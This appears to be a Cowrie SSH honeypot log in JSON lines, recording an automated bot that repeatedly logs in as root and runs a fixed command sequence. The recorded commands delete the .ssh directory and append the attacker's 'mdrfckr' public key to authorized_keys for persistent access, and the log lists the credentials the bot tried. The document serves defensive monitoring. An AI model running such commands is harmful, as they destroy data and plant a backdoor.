{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:20:08.684523Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:20:08.685295Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:20:08.686249Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:09.220396Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:20:09.530423Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:20:09.531104Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:20:09.778928Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:09.779825Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36918,"dst_ip":"1.2.3.4","dst_port":22,"session":"8525d65ffad8","protocol":"ssh","message":"New connection: 212.227.235.229:36918 (1.2.3.4:22) [session: 8525d65ffad8]","sensor":"my-vps","timestamp":"2025-09-09T06:20:10.022038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:20:10.023062Z","src_ip":"212.227.235.229","session":"8525d65ffad8"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:20:10.267925Z","src_ip":"212.227.235.229","session":"8525d65ffad8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:20:11.285853Z","src_ip":"212.227.235.229","session":"8525d65ffad8"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:12.531684Z","src_ip":"212.227.235.229","session":"8525d65ffad8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37782,"dst_ip":"1.2.3.4","dst_port":22,"session":"466cdf2c36ce","protocol":"ssh","message":"New connection: 212.227.235.229:37782 (1.2.3.4:22) [session: 466cdf2c36ce]","sensor":"my-vps","timestamp":"2025-09-09T06:20:12.780690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:20:12.781678Z","src_ip":"212.227.235.229","session":"466cdf2c36ce"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:20:13.029284Z","src_ip":"212.227.235.229","session":"466cdf2c36ce"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:20:14.061982Z","src_ip":"212.227.235.229","session":"466cdf2c36ce"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:14.308368Z","src_ip":"212.227.235.229","session":"32de8f9cc7f2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:14.310870Z","src_ip":"212.227.235.229","session":"466cdf2c36ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45121,"dst_ip":"1.2.3.4","dst_port":22,"session":"a99cbc53a709","protocol":"ssh","message":"New connection: 212.227.235.229:45121 (1.2.3.4:22) [session: a99cbc53a709]","sensor":"my-vps","timestamp":"2025-09-09T06:20:17.576687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:20:17.577740Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:20:17.929507Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.login.success","username":"root","password":"09N1RCa1Hs31","message":"login attempt [root/09N1RCa1Hs31] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:20:19.424634Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:20:20.252963Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:20:20.253750Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:20:20.254892Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:20.956704Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:20:21.361235Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:20:21.361921Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:20:21.776477Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:21.777356Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46022,"dst_ip":"1.2.3.4","dst_port":22,"session":"275a0c8de97a","protocol":"ssh","message":"New connection: 212.227.235.229:46022 (1.2.3.4:22) [session: 275a0c8de97a]","sensor":"my-vps","timestamp":"2025-09-09T06:20:22.178370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:20:22.179261Z","src_ip":"212.227.235.229","session":"275a0c8de97a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:20:22.580794Z","src_ip":"212.227.235.229","session":"275a0c8de97a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:20:24.067890Z","src_ip":"212.227.235.229","session":"275a0c8de97a"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:25.418120Z","src_ip":"212.227.235.229","session":"275a0c8de97a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46670,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c04045f306f","protocol":"ssh","message":"New connection: 212.227.235.229:46670 (1.2.3.4:22) [session: 0c04045f306f]","sensor":"my-vps","timestamp":"2025-09-09T06:20:25.775531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:20:25.776645Z","src_ip":"212.227.235.229","session":"0c04045f306f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:20:26.143986Z","src_ip":"212.227.235.229","session":"0c04045f306f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:20:27.949290Z","src_ip":"212.227.235.229","session":"0c04045f306f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:28.325771Z","src_ip":"212.227.235.229","session":"0c04045f306f"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:28.329046Z","src_ip":"212.227.235.229","session":"a99cbc53a709"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49305,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dbfd24723cb","protocol":"ssh","message":"New connection: 212.227.235.229:49305 (1.2.3.4:22) [session: 0dbfd24723cb]","sensor":"my-vps","timestamp":"2025-09-09T06:20:41.382975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:20:41.383682Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:20:41.720622Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.login.success","username":"root","password":"09N1RCa1Hs31","message":"login attempt [root/09N1RCa1Hs31] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:20:44.753733Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:20:45.501083Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:20:45.501822Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:20:45.503190Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:46.233679Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:20:46.626915Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 